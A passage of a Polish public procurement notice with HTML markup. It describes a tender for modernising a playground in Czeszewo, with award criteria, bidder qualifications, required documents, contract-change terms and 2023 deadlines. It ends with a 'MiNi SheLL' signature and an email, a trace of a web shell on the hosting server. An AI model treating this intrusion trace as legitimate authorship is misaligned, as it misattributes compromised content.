- Modernizacja placu zabaw w miejscowości Czeszewo obejmuje modernizację placu zabaw w miejscowości Czeszewo na działce gruntu o nr ew. 202 w tym wykonanie prac obejmujących:<br/>•	Roboty ziemne i betonowe<br/>•	Dostawę i montaż urządzeń placu zabaw<br/><br/>Szczegółowy opis przedmiotu zamówienia znajduje się w części III SWZ:<br/>SWZ III – Przedmiar – CZĘŚĆ II<br/>SWZ III – Szczegółowy opis przedmiotu zamówienia – CZĘŚĆ II<br/><br/><br/>Zamawiający dopuszcza składanie ofert częściowych. Ofertę można złożyć w odniesieniu do jednej, kilku lub wszystkich części zamówienia.<br/>Wykonawca w składanej ofercie wyceni całość prac dotyczącą danej części osobno, wyszczególniając koszty pojedynczych elementów zamówienia. <br/>Zamawiający nie określa maksymalnej liczby części, na które może zostać udzielone zamówienie jednemu Wykonawcy.<br/><br/>UWAGA!<br/>W przypadku, gdy dokumentacja techniczna zawierać będzie nazwę producenta lub firmy, Zamawiający zastrzega możliwość zastosowania innych materiałów jednak <br/>o parametrach nie gorszych niż opisane w dokumentacji i przedmiarze. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112720-8 - Roboty w zakresie kształtowania terenów sportowych i rekreacyjnych</p> <p class="mb-0">37535200-9 - Wyposażenie placów zabaw</p> <p class="mb-0">37410000-5 - Sprzęt sportowy do uprawiania sportów na wolnym powietrzu</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">49 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej ofert Zamawiający będzie się kierował kryterium oceny ofert:<br/>1) Cena<br/>2) Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>7.2	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa przedmiotowego warunku udziału w postępowaniu.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie określa przedmiotowego warunku udziału w postępowaniu.<br/><br/>3)	sytuacji ekonomicznej i finansowej:<br/>Zamawiający nie określa przedmiotowego warunku udziału w postępowaniu.<br/><br/>4)	posiadania zdolności technicznej lub zawodowej:<br/><br/>DLA CZĘŚCI I:<br/><br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał (zakończył), co najmniej: 2 inwestycje polegające na budowie miejsca rekreacji wraz z placem zabaw o wartości powyżej 50 000,00 zł<br/><br/>DLA CZĘŚCI II:<br/><br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał (zakończył), co najmniej: 2 inwestycje polegające na modernizacji placu zabaw o wartości powyżej 15.000,00 zł<br/><br/><br/><br/>7.3.	Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.2.2.	Wykaz podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu: <br/>a.	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 <br/>i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; <br/>b.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu <br/>z art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania określonych w: <br/>- art. 108 ust. 1 pkt 3 PZP, <br/>- art. 108 ust. 1 pkt 4 PZP dotyczących orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka zapobiegawczego, <br/>- art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>- art. 108 ust. 1 pkt 6 PZP. <br/>c.	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.2.3.	Wykaz podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 6.1.	Zamawiający wymaga złożenia wraz z ofertą składaną na CZĘŚĆ I przedmiotowych środków dowodowych w postaci:<br/>6.1.1.	Wykazu oferowanych urządzeń obejmującego następujące informacje o:<br/>6.1.1.1.	Huśtawce potrójnej:<br/>6.1.1.1.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.2.	Dwóch wieżach, dwóch ślizgach, przejściu rurowym, mostku i podejściu wspinaczkowym:<br/>6.1.1.2.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.3.	Sprężynowcu podwójnym:<br/>6.1.1.3.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.4.	Sprężynowcu pojedynczym:<br/>6.1.1.4.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.5.	Siłowni orbitrek + narty<br/>6.1.1.5.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.6.	Siłowni wioślarz + biegacz<br/>6.1.1.6.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.7.	Siłowni stepper + pajacyk<br/>6.1.1.7.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.8.	Siłowni wyciąg + krzesło:<br/>6.1.1.8.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.9.	Gotowych ławkach parkowych:<br/>6.1.1.9.1.	ilustracja ławek, wymiary ławek<br/>6.1.1.10.	Gotowych koszach na śmieci:<br/>6.1.1.10.1.	ilustracja koszy na śmieci, wymiary koszy na śmieci<br/>6.1.1.11.	Tablicy informacyjnej:<br/>6.1.1.11.1.	Ilustracja tablicy informacyjnej, wymiary tablicy informacyjnej<br/>6.1.1.12.	Lampach solarnych:<br/>6.1.1.12.1.	Ilustracja lampy, wymiary lampy<br/>6.2.	Zamawiający wymaga złożenia wraz z ofertą składaną na CZĘŚĆ II przedmiotowych środków dowodowych w postaci:<br/>6.2.1.	Wykazu oferowanych urządzeń obejmującego następujące informacje o:<br/>6.2.1.1.	Dwóch wieżach, dwóch ślizgach, przejściu rurowym, mostku i podejściu wspinaczkowych:<br/>6.2.1.1.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/><br/>6.3.	Stosownie do art. 107 ust. 2 PZP Jeżeli wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 6.1.	Zamawiający wymaga złożenia wraz z ofertą składaną na CZĘŚĆ I przedmiotowych środków dowodowych w postaci:<br/>6.1.1.	Wykazu oferowanych urządzeń obejmującego następujące informacje o:<br/>6.1.1.1.	Huśtawce potrójnej:<br/>6.1.1.1.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.2.	Dwóch wieżach, dwóch ślizgach, przejściu rurowym, mostku i podejściu wspinaczkowym:<br/>6.1.1.2.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.3.	Sprężynowcu podwójnym:<br/>6.1.1.3.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.4.	Sprężynowcu pojedynczym:<br/>6.1.1.4.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.5.	Siłowni orbitrek + narty<br/>6.1.1.5.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.6.	Siłowni wioślarz + biegacz<br/>6.1.1.6.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.7.	Siłowni stepper + pajacyk<br/>6.1.1.7.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.8.	Siłowni wyciąg + krzesło:<br/>6.1.1.8.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/>6.1.1.9.	Gotowych ławkach parkowych:<br/>6.1.1.9.1.	ilustracja ławek, wymiary ławek<br/>6.1.1.10.	Gotowych koszach na śmieci:<br/>6.1.1.10.1.	ilustracja koszy na śmieci, wymiary koszy na śmieci<br/>6.1.1.11.	Tablicy informacyjnej:<br/>6.1.1.11.1.	Ilustracja tablicy informacyjnej, wymiary tablicy informacyjnej<br/>6.1.1.12.	Lampach solarnych:<br/>6.1.1.12.1.	Ilustracja lampy, wymiary lampy<br/>6.2.	Zamawiający wymaga złożenia wraz z ofertą składaną na CZĘŚĆ II przedmiotowych środków dowodowych w postaci:<br/>6.2.1.	Wykazu oferowanych urządzeń obejmującego następujące informacje o:<br/>6.2.1.1.	Dwóch wieżach, dwóch ślizgach, przejściu rurowym, mostku i podejściu wspinaczkowych:<br/>6.2.1.1.1.	zdjęcie lub ilustracja katalogowa urządzenia z techniczną informacją dotyczącą urządzenia (wymiary urządzenia).<br/><br/>6.3.	Stosownie do art. 107 ust. 2 PZP Jeżeli wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca załącza również:<br/>a. Pełnomocnictwo<br/>Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. W przypadku wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z<br/>treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w<br/>szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>b. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, są zobowiązani dołączyć do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lubusługi, do realizacji których te zdolności są wymagane.<br/>W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy.<br/>c. Wykaz rozwiązań równoważnych – wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany<br/>wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku<br/>wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami.<br/>d. Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą<br/>zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one<br/>udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji.<br/>e. Przedmiotowe środki dowodowe <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku: <br/>a.	wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego; <br/>b.	wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem; <br/>c.	w przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia; <br/>d.	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania; <br/>e.	wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 10 SWZ IV Projektowanych postanowień umowy (zarówno dla Części I i Części II):<br/>1. Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty<br/>w następujących przypadkach:<br/>1) Zamawiający dopuszcza możliwość zmiany terminu wykonania przedmiotu umowy<br/>poprzez jego wydłużenie w przypadku, gdy ze względów organizacyjnych lub technicznych leżących po stronie<br/>Zamawiającego trwających dłużej niż 7 dni kalendarzowych, nie było możliwe przystąpienie do wykonania lub<br/>kontynuowanie przedmiotu umowy, w terminie przewidzianym przez Zamawiającego. W takim przypadku zmiana terminu<br/>nastąpi o okres trwania przeszkody;<br/>2) dopuszczalne są zmiany postanowień umowy, które wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne<br/>będzie dostosowanie postanowień umowy do nowego stanu prawnego. Zmiany w tym zakresie ograniczone będą wyłącznie<br/>do dostosowania umowy do zmienionych regulacji prawnych;<br/>3) Zamawiający dopuszcza możliwość wydłużenia terminu realizacji przedmiotu umowy<br/>w przypadku wystąpienia Siły wyższej (na przykład powódź, huragan, trzęsienie ziemi, śnieżyca, uderzenia pioruna,<br/>gradobicie, tąpnięcia górnicze, epidemie, pożary, wojna, zamieszki krajowe, strajki, zaprzestania, wstrzymania produkcji<br/>sprzętu przez producenta) uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. W takim<br/>przypadku wydłużenie terminu nastąpi o okres niezbędny do usunięcia skutków działania siły wyższej nie dłużej jednak niż o<br/>90 dni;<br/>4) Zamawiający dopuszcza możliwość wydłużenia terminu realizacji przedmiotu umowyw przypadku wystąpienia okoliczności związanych z COVID-19 lub okoliczności związanych z konfliktem zbrojnym na<br/>Ukrainie, mających wpływ na terminowe wykonanie przedmiotu umowy. W takim przypadku wydłużenie terminu nastąpi o<br/>okres niezbędny do usunięcia skutków wystąpienia powyższych okoliczności nie dłużej jednak niż o 90 dni;<br/>5) dopuszczalna jest zmiana modeli, typów i parametrów technicznych urządzeń składających się na przedmiot umowy ze<br/>skutkami wprowadzenia tych zmian, wynikająca z wycofania z produkcji, jak również w przypadku wstrzymania produkcji lub<br/>opóźnień w produkcji modeli, typów i parametrów technicznych urządzeń opisanych w cz. III SWZ – Opis Przedmiotu<br/>Zamówienia. Zmiana możliwa jest na sprzęt o parametrach technicznych i funkcjonalnych co najmniej takich, jak wskazane<br/>w cz. III SWZ – Opis Przedmiotu Zamówienia, ze skutkami wprowadzenia tych zmian. Przed dokonaniem zmiany<br/>Wykonawca zobowiązany jest przedstawić Zamawiającemu opis parametrów technicznych i funkcjonalnych proponowanych<br/>modeli, typów i konfiguracji technicznych urządzeń.<br/>6) dopuszczalna jest zmiana wynagrodzenia Wykonawcy w przypadku zmiany powszechnie obowiązujących przepisów w<br/>zakresie wysokości stawki podatku od towarów i usług na przedmiot świadczenia,<br/>2. Zmiany umowy mogą zostać zainicjowane zarówno przez Zamawiającego jak i przez Wykonawcę.<br/>3. W przypadku konieczności wprowadzenia zmian do umowy strona zainteresowana przekazuje drugiej stronie wniosek na<br/>piśmie na adresy wskazane w umowie wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej<br/>zmiany.<br/>4. Wniosek, o którym mowa powyżej powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 5 dni<br/>roboczych od dnia, w którym Strona dowiedziała się, lub powinna dowiedzieć się o danym zdarzeniu lub okolicznościach.<br/>5. Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem wszelkich innych dokumentów wymaganych Umową<br/>uzasadniających żądanie zmiany Umowy, stosownie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany.<br/>6. W terminie 5 dni roboczych od dnia otrzymania wniosku wraz z uzasadnieniem żądania zmiany Umowy, druga strona<br/>zobowiązana jest do pisemnego ustosunkowania się do zgłoszonego żądania zmiany Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Otwarcie ofert następuje poprzez użycie mechanizmu do odszyfrowania ofert dostępnego po zalogowaniu na Platformie e-Zamówienia i następuje poprzez otwarcie etapu ofertowego inicjującego odszyfrowanie ofert.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com